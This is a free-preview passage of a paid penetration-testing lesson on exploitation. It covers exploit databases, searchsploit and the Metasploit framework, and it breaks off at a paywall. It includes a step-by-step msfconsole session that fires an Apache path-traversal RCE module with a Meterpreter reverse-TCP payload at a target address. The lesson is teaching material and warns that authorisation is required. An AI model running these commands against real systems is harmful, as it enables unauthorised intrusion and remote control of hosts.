You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Exploitation is where theory meets practice — you take the vulnerabilities identified during scanning and enumeration and attempt to gain unauthorised access to demonstrate real-world impact. This lesson covers the Metasploit framework, exploit selection, payloads, shells, and post-exploitation basics.
Critical: Exploitation must only be performed on systems you have written authorisation to test. Accidentally exploiting out-of-scope systems can have legal consequences and cause real damage.
┌─────────────────────┐
│ 1. Identify │
│ vulnerability │
└──────────┬──────────┘
▼
┌─────────────────────┐
│ 2. Research exploit │
│ (CVE, PoC, etc.) │
└──────────┬──────────┘
▼
┌─────────────────────┐
│ 3. Select/configure │
│ exploit + payload │
└──────────┬──────────┘
▼
┌─────────────────────┐
│ 4. Execute exploit │
│ (verify scope!) │
└──────────┬──────────┘
▼
┌─────────────────────┐
│ 5. Establish access │
│ (shell/session) │
└──────────┬──────────┘
▼
┌─────────────────────┐
│ 6. Document and │
│ move to post- │
│ exploitation │
└─────────────────────┘
Before writing your own exploits, search existing databases:
| Resource | URL | Description |
|---|---|---|
| Exploit-DB | exploit-db.com | Curated archive of public exploits |
| CVE Details | cvedetails.com | CVE database with CVSS scores |
| NVD | nvd.nist.gov | National Vulnerability Database |
| Packet Storm | packetstormsecurity.com | Security tools and exploits |
| GitHub PoCs | github.com (search CVE-YYYY) | Proof-of-concept repositories |
# Search Exploit-DB from the command line (Kali)
searchsploit apache 2.4.49
searchsploit -m 50383 # mirror (download) an exploit
Metasploit is the most widely used exploitation framework. It provides a structured approach to finding, configuring, and executing exploits.
┌──────────────────────────────────────┐
│ Metasploit Framework │
├──────────────────────────────────────┤
│ Exploits │ Code that triggers │
│ │ the vulnerability │
├──────────────┼───────────────────────┤
│ Payloads │ Code that runs after │
│ │ exploitation │
├──────────────┼───────────────────────┤
│ Auxiliary │ Scanners, fuzzers, │
│ │ brute-forcers │
├──────────────┼───────────────────────┤
│ Post │ Post-exploitation │
│ │ modules │
├──────────────┼───────────────────────┤
│ Encoders │ Obfuscate payloads │
│ │ to evade detection │
└──────────────┴───────────────────────┘
# Start the Metasploit console
msfconsole
# Search for an exploit
msf6 > search type:exploit apache
msf6 > search cve:2021-41773
# Select an exploit
msf6 > use exploit/multi/http/apache_normalize_path_rce
# View required options
msf6 exploit(...) > show options
# Set target and payload options
msf6 exploit(...) > set RHOSTS 192.168.1.100
msf6 exploit(...) > set RPORT 443
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444
# Select a payload
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
# Run the exploit
msf6 exploit(...) > exploit
A payload is the code that executes on the target after successful exploitation.
| Type | Description | Example |
|---|---|---|
| Singles | Self-contained, all in one | linux/x64/exec |
| Stagers | Small initial payload that downloads the stage | windows/x64/meterpreter/reverse_tcp |
| Stages | Downloaded by stager, provides full functionality | Meterpreter, shell |
# List available payloads
msf6 > show payloads
# Filter by platform
msf6 > show payloads | grep windows/x64
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.